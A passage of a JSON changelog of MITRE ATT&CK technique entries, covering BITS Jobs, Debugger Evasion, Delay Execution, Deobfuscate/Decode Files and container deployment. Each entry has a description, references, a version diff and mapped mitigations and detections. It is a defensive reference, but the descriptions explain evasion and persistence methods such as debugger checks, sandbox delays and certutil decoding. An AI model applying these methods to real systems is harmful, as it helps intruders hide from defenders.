class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">esponder)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1030: Network Segmentation",
                            "M1031: Network Intrusion Prevention",
                            "M1037: Filter Network Traffic",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0462: Detect LLMNR/NBT-NS Poisoning and SMB Relay on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 19:57:02.003000+00:00",
                    "name": "BITS Jobs",
                    "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1197",
                            "external_id": "T1197"
                        },
                        {
                            "source_name": "CTU BITS Malware June 2016",
                            "description": "Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.",
                            "url": "https://www.secureworks.com/blog/malware-lingers-with-bits"
                        },
                        {
                            "source_name": "Symantec BITS May 2007",
                            "description": "Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.",
                            "url": "https://www.symantec.com/connect/blogs/malware-update-windows-update"
                        },
                        {
                            "source_name": "PaloAlto UBoatRAT Nov 2017",
                            "description": "Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
                        },
                        {
                            "source_name": "Microsoft BITS",
                            "description": "Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx"
                        },
                        {
                            "source_name": "Microsoft BITSAdmin",
                            "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.",
                            "url": "https://msdn.microsoft.com/library/aa362813.aspx"
                        },
                        {
                            "source_name": "Microsoft COM",
                            "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"
                        },
                        {
                            "source_name": "Mondok Windows PiggyBack BITS May 2007",
                            "description": "Mondok, M. (2007, May 11). Malware piggybacks on Windows\u2019 Background Intelligent Transfer Service. Retrieved January 12, 2018.",
                            "url": "https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Brent Murphy, Elastic",
                        "David French, Elastic",
                        "Red Canary",
                        "Ricardo Dias"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": false}, \"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:57:02.003000+00:00\", \"old_value\": \"2025-10-24 17:49:22.711000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"execution\", \"old_value\": \"defense-evasion\", \"new_path\": \"root['kill_chain_phases'][2]['phase_name']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_added\": {\"root['kill_chain_phases'][0]\": {\"kill_chain_name\": \"mitre-attack\", \"phase_name\": \"stealth\"}}, \"iterable_item_removed\": {\"root['external_references'][3]\": {\"source_name\": \"Elastic - Hunting for Persistence Part 1\", \"description\": \"French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.\", \"url\": \"https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft Issues with BITS July 2011\", \"description\": \"Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.\", \"url\": \"https://technet.microsoft.com/library/dd939934.aspx\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1028: Operating System Configuration",
                            "M1037: Filter Network Traffic"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0098: Detect abuse of Windows BITS Jobs for download, execution and persistence"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--800f9819-7007-4540-a520-40e655876800",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-03-30 17:54:03.944000+00:00",
                    "modified": "2026-04-15 19:56:51.027000+00:00",
                    "name": "Build Image on Host",
                    "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it\u2019s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1612",
                            "external_id": "T1612"
                        },
                        {
                            "source_name": "Aqua Build Images on Hosts",
                            "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.",
                            "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"
                        },
                        {
                            "source_name": "Docker Build Image",
                            "description": "Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.",
                            "url": "https://docs.docker.com/engine/api/v1.41/#operation/ImageBuild"
                        },
                        {
                            "source_name": "Aqua Security Cloud Native Threat Report June 2021",
                            "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.",
                            "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Assaf Morag, @MoragAssaf, Team Nautilus Aqua Security",
                        "Roi Kol, @roykol1, Team Nautilus Aqua Security",
                        "Michael Katchinskiy, @michael64194968, Team Nautilus Aqua Security",
                        "Vishwas Manral, McAfee"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:56:51.027000+00:00\", \"old_value\": \"2025-10-24 17:49:01.646000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1030: Network Segmentation",
                            "M1035: Limit Access to Resource Over Network",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0459: Detection Strategy for Build Image on Host"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-04-01 17:59:46.156000+00:00",
                    "modified": "2026-04-15 19:57:49.208000+00:00",
                    "name": "Debugger Evasion",
                    "description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)\n\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\n\nSpecific checks will vary based on the target and/or adversary. On Windows, this may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools.(Citation: Cado Security P2PInfect 2023)(Citation: Positive Technologies Hellhounds 2023) Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would \u201cswallow\u201d or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)\n\nMalware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program\u2019s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program\u2019s execution to continue.(Citation: Apriorit)\n\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1622",
                            "external_id": "T1622"
                        },
                        {
                            "source_name": "Apriorit",
                            "description": "Apriorit. (2024, June 4). Anti Debugging Protection Techniques with Examples. Retrieved March 4, 2025.",
                            "url": "https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software"
                        },
                        {
                            "source_name": "Checkpoint Dridex Jan 2021",
                            "description": "Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.",
                            "url": "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/"
                        },
                        {
                            "source_name": "hasherezade debug",
                            "description": "hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.",
                            "url": "https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf"
                        },
                        {
                            "source_name": "Cado Security P2PInfect 2023",
                            "description": "jbowen. (2023, December 4). P2Pinfect - New Variant Targets MIPS Devices. Retrieved March 18, 2025.",
                            "url": "https://www.cadosecurity.com/blog/p2pinfect-new-variant-targets-mips-devices"
                        },
                        {
                            "source_name": "AlKhaser Debug",
                            "description": "Noteworthy. (2019, January 6). Al-Khaser. Retrieved April 1, 2022.",
                            "url": "https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug"
                        },
                        {
                            "source_name": "wardle evilquest partii",
                            "description": "Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.",
                            "url": "https://objective-see.com/blog/blog_0x60.html"
                        },
                        {
                            "source_name": "ProcessHacker Github",
                            "description": "ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.",
                            "url": "https://github.com/processhacker/processhacker"
                        },
                        {
                            "source_name": "Positive Technologies Hellhounds 2023",
                            "description": "PT Expert Security Center. (2023, November 29). Hellhounds: operation Lahat. Retrieved March 18, 2025.",
                            "url": "https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/hellhounds-operation-lahat"
                        },
                        {
                            "source_name": "vxunderground debug",
                            "description": "vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.",
                            "url": "https://web.archive.org/web/20250904153443/https://github.com/vxunderground/VX-API/tree/main#anti-debug"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Joas Antonio dos Santos, @C0d3Cr4zy",
                        "TruKno"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:57:49.208000+00:00\", \"old_value\": \"2025-10-24 17:49:32.196000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][9]['url']\": {\"new_value\": \"https://web.archive.org/web/20250904153443/https://github.com/vxunderground/VX-API/tree/main#anti-debug\", \"old_value\": \"https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0371: Detection Strategy for Debugger Evasion (T1622)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a1df809c-7d0e-459f-8fe5-25474bab770b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-24 18:03:15.021000+00:00",
                    "modified": "2026-04-15 19:57:37.301000+00:00",
                    "name": "Delay Execution",
                    "description": "Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems. \n\nAdversaries may utilize programmatic `sleep` commands or native system scheduling functionality, for example [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053). Benign commands or other operations may also be used to delay malware execution or ensure prior commands have had time to execute properly. Loops or otherwise needless repetitions of commands, such as `ping`, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1678",
                            "external_id": "T1678"
                        },
                        {
                            "source_name": "Joe Sec Nymaim",
                            "description": "Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.",
                            "url": "https://www.joesecurity.org/blog/3660886847485093803"
                        },
                        {
                            "source_name": "Joe Sec Trickbot",
                            "description": "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.",
                            "url": "https://www.joesecurity.org/blog/498839998833561473"
                        },
                        {
                            "source_name": "Revil Independence Day",
                            "description": "Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.",
                            "url": "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/"
                        },
                        {
                            "source_name": "Netskope Nitol",
                            "description": "Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.",
                            "url": "https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Deloitte Threat Library Team",
                        "Jeff Felling, Red Canary",
                        "Jorge Orchilles, SCYTHE",
                        "Ruben Dodge, @shotgunner101"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:57:37.301000+00:00\", \"old_value\": \"2025-10-21 23:58:09.956000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0372: Multi-Platform Detection Strategy for T1678 - Delay Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-12-14 16:46:06.044000+00:00",
                    "modified": "2026-04-15 19:58:25.069000+00:00",
                    "name": "Deobfuscate/Decode Files or Information",
                    "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1140",
                            "external_id": "T1140"
                        },
                        {
                            "source_name": "Volexity PowerDuke November 2016",
                            "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.",
                            "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/"
                        },
                        {
                            "source_name": "Sentinel One Tainted Love 2023",
                            "description": "Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen. (2023, March 23). Operation Tainted Love | Chinese APTs Target Telcos in New Attacks. Retrieved March 18, 2025.",
                            "url": "https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/"
                        },
                        {
                            "source_name": "Malwarebytes Targeted Attack against Saudi Arabia",
                            "description": "Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.",
                            "url": "https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/"
                        },
                        {
                            "source_name": "Carbon Black Obfuscation Sept 2016",
                            "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.",
                            "url": "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Crist\u00f3bal Mart\u00ednez Mart\u00edn",
                        "Matthew Demaske, Adaptforward",
                        "Red Canary"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 19:58:25.069000+00:00\", \"old_value\": \"2025-10-24 17:48:40.925000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0275: Detect Adversary Deobfuscation or Decoding of Files and Payloads"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-03-29 16:51:26.020000+00:00",
                    "modified": "2026-04-15 19:59:11.024000+00:00",
                    "name": "Deploy Container",
                    "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nContainers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Container)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1610",
                            "external_id": "T1610"
                        },
                        {
                            "source_name": "AppSecco Kubernetes Namespace Breakout 2020",
                            "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume \u2014 Part 1. Retrieved January 16, 2024.",
                            "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216"
                        },
                        {
                            "source_name": "Aqua Build Images on Hosts",
                            "description": "Assaf Morag. (2020, July 15). Threat Alert: Attackers Building Malicious Images on Your Hosts. Retrieved March 29, 2021.",
                            "url": "https://blog.aquasec.com/malicious-container-image-docker-container-host"
                        },
                        {
                            "source_name": "Docker Container",
                            "description": "DockerDocs. (n.d.). Retrieved December 8, 2025.",
                            "url": "https://docs.docker.com/reference/cli/docker/container/create/"
                        },
                        {
                            "source_name": "Kubernetes Workload Management",
                            "description": "Kubernetes. (n.d.). Workload Management. Retrieved March 28, 2024.",
                            "url": "https://kubernetes.io/docs/concepts/workloads/controllers/"
                        },
                        {
                            "source_name": "Kubeflow Pipelines",
